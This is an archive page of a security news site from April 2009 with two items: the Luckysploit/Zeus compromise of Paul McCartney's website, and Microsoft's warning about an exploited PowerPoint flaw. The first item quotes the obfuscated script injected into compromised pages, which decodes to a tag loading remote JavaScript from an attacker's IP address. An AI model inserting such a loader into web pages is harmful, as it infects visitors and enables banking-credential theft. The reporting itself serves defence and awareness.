CyberInsecure.com

Archive for April, 2009

The website of famed singer Paul McCartney is the latest victim in a string of website compromises involving the Luckysploit exploit toolkit. The compromises are related to an outbreak of bank-related data theft trojans during the first quarter of 2009. These outbreaks track back to the Zeus botnet which was implicated in a $6 million dollar commercial account heist on 20 European banks in the summer of 2008.

As far as exploit toolkits go, Luckysploit is a bit unusual inasmuch as it uses an asymmetric key algorithm (standard RSA public/private key cryptography) to encrypt the communication session with the browser.

Zeus bots are known for browser traffic sniffing, intercepting POST data and keystrokes associated with the active browser session as well as clipboard data pasted into the browser. While these actions faciliate Zeus’ activities concerning banking theft, it could also lead to compromise of FTP credentials. For this reason, impacted sites may not just be spreading new Zeus banking trojans and bots, their management systems may also be infected with previous variants of Zeus bots and banking trojans.

Embedded scripts on impacted pages may appear as follows:

var source =”=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;0095/355/249/660hpphmf.bobmzujdt0hb/kt#?=0tdsjqu?”; var result = “”;for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);document.write(result);

Compromises have also been observed on flat HTML-only sites, furthering the likelihood that compromised FTP credentials may be the cause. As with most malware today, symptoms of a Zeus infection include the disabling of firewall or other security software. Zeus bots and trojans are also rootkit-enabled, which may hamper discovery efforts.

Credit: Mary Landesman, ScanSafe Blog

Rigged PowerPoint files are being used to exploit an unpatched vulnerability in Microsoft’s presentation software, according to warning late Thursday from Microsoft who has confirmed that hackers are using the flaw to assault vulnerable systems.

The attacks rely on tricking prospective marks into opening a maliciously crafted PowerPoint file, either hosted on a website or sent via email. In both scenarios users would have to open a booby-trapped PowerPoint designed to exploit the vulnerability.

In a statement published on Thursday, Microsoft said it was “aware only of limited and targeted attacks that attempt to use this vulnerability”.

Net security firm McAfee said it has “discovered multiple attacks in the field using the PowerPoint exploit” to install Trojans onto vulnerable systems. Hackers have crafted these exploits in an attempt to disguise malign actions, it adds. “Some of these specially crafted exploits arrived as PowerPoint Showfiles with the ‘.pps’ extension,” McAfee reports. “Such files typically open in full screen mode and hide the applications running on the desktop, such as system monitoring tools that could give any clue to the dodgy installation of Trojans to the victim.”

Affected software packages include fully patched versions of Microsoft Office PowerPoint 2000, PowerPoint 2002, PowerPoint 2003 and Microsoft Office 2004 for Mac. Other versions including Microsoft Office PowerPoint 2007 and Microsoft Office 2008 for Mac are in the clear.

Microsoft said it was investigating the problem, something that normally results in a patch. The next scheduled Patch Tuesday falls on 14 April, but the necessary update may or may not be ready in time. Microsoft has to find time to develop and test a patch, the particular technical difficulty of which remains unclear and perhaps unknowable outside Redmond.

Microsoft holds back details of flaws until patches become available and has activated its security incident response process, which includes collaboration with anti-malware partners and internal efforts to identify the buggy portions of the code. Once the process is complete, the company will issue a bulletin with patches.

In the meantime, Microsoft recommends that Office users avoid opening or saving files, even from trusted sources because those could be spoofed. PowerPoint users should consider implementing MOICE (http://support.microsoft.com/kb/935865), a tool that uses the 2007 Microsoft Office system converters to convert the Office binary format files into the Office Open XML format.

An unpatched Excel flaw, which is also the subject of targeted attacks since late February, failed to appear in Microsoft’s March patch batch.

Credit: The Register